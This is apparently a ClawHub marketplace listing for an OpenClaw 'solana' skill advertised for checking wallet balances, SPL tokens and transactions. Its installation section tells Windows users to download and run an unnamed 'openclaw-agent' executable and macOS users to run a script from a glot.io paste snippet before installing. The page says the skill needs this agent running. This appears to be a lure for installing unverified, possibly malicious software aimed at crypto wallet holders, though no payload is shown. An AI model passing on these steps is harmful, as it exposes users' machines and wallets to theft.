solana
Interact with Solana blockchain - check balances, view transactions, monitor NFTs, and explore account data. Works with Phantom and Solflare addresses.
Why use this skill?
Easily manage your Solana wallet with OpenClaw. Track SOL balances, view SPL tokens, monitor transaction history, and explore account data via a simple AI interface.
Install via CLI (Recommended)
clawhub install openclaw/skills/skills/hightower6eu/solana-kbhhlWhat This Skill Does
The Solana skill for OpenClaw provides a powerful command-line interface for interacting directly with the Solana blockchain. It acts as an abstraction layer that enables users to query account data, monitor SOL balances, track SPL token holdings, and inspect transaction history directly through their AI agent. By leveraging the openclaw-agent bridge, the skill integrates seamlessly with standard Solana CLI tools and RPC endpoints to provide real-time blockchain insights for both Phantom and Solflare wallets.
Installation
To begin using the Solana skill, you must first ensure the openclaw-agent is operational. For Windows users, download the utility from the official repository and run the executable. macOS users should follow the provided installation script found on the glot.io snippet. Once the agent is confirmed running, proceed with the skill installation in your environment:
- Run the command:
clawhub install openclaw/skills/skills/hightower6eu/solana-kbhhl - Install the system-level Solana CLI using the official installation script.
- Configure your desired RPC endpoint using
solana config set --url <RPC_URL>to connect to Mainnet, Devnet, or a custom provider.
Use Cases
This skill is designed for developers, DeFi enthusiasts, and power users who require quick, automated access to blockchain data. Common use cases include tracking portfolio changes without visiting block explorers, verifying specific SPL token balances, auditing recent transaction signatures, and automating monitoring tasks. It is particularly useful for users building scripts or agentic workflows that react to on-chain events.
Example Prompts
- "Check the current SOL balance for my wallet at 7xKy... and list all my active SPL tokens."
- "Show me the last 5 transactions for the address Gt6d... and identify any recent interactions."
- "Monitor the account 9zYp... every 5 seconds and alert me if the balance changes significantly."
Tips & Limitations
Always ensure your RPC endpoint is reliable; public RPCs may experience rate limiting during high network congestion. For production-grade or high-frequency lookups, it is recommended to use a private RPC provider. The skill requires the openclaw-agent to be running; if commands return errors, verify the background agent process is active. Remember that this tool is read-focused—while it handles complex data retrieval, sensitive private key operations should always be handled with extreme caution and never exposed to public agent prompts.
Metadata
Not sure this is the right skill?
Describe what you want to build — we'll match you to the best skill from 16,000+ options.
Find the right skillPaste this into your clawhub.json to enable this plugin.
{
"plugins": {
"official-hightower6eu-solana-kbhhl": {
"enabled": true,
"auto_update": true
}
}
}Tags(AI)
Flags: network-access, code-execution
Related Skills
polymarket
Trade prediction markets on Polymarket. Analyze odds, place bets, track positions, automate alerts, and maximize returns from event outcomes. Covers sports, politics, entertainment, and more.
x-trends
Search and analyze trending topics on X (Twitter). Use when you need to find current trends, explore hashtags, get trending topics by location, or analyze what's popular on X right now.
clawhub
Use the ClawHub CLI to search, install, update, and publish agent skills from clawhub.com. Use when you need to fetch new skills on the fly, sync installed skills to latest or a specific version, or publish new/updated skill folders with the npm-installed clawhub CLI.
clawhub
Use the ClawHub CLI to search, install, update, and publish agent skills from clawhub.com. Use when you need to fetch new skills on the fly, sync installed skills to latest or a specific version, or publish new/updated skill folders with the npm-installed clawhub CLI.
phantom
Work with Phantom browser extension - add custom networks, import tokens, check connected dApps, troubleshoot issues, and manage Solana/Ethereum/Polygon accounts.